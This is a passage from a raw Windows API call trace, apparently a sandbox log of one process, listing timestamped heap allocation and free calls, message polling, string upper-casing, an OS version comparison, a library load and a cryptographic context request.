lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.574] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0265.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.575] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.575] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0265.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.575] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.575] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0265.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.575] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.576] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.576] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.576] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.576] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.576] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.576] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.577] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0265.577] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.577] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0265.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.578] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0265.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.578] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0265.578] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0265.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0265.579] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.579] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.579] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.579] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0265.579] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.579] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0265.579] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.579] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.580] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0265.580] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.580] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.580] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.580] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0265.580] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0265.580] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.580] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.580] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.580] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.580] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.580] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0265.580] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.580] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0265.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0265.581] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.581] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2be8) returned 1 [0265.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0265.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e30 [0265.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2c18 [0265.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0265.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.582] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c00 | out: hHeap=0x25c0000) returned 1 [0265.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c00 [0265.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.582] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.583] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.583] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0265.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0265.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa908 | out: hHeap=0x25c0000) returned 1 [0265.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa908 [0265.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0265.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.584] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0265.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0265.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0265.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0265.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0265.584] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9eb8 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa968 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fa8 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.585] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa920 | out: hHeap=0x25c0000) returned 1 [0265.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0265.586] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0265.586] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.586] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0265.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0265.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0265.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0265.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0265.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0265.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0265.587] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0265.587] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0265.587] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0265.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0265.588] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0265.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0265.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0265.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18d8 [0265.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0265.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0c8 [0265.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0265.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0265.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0265.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa860 [0265.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0265.588] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c78 [0265.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0265.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0265.588] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0265.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0265.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0265.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | 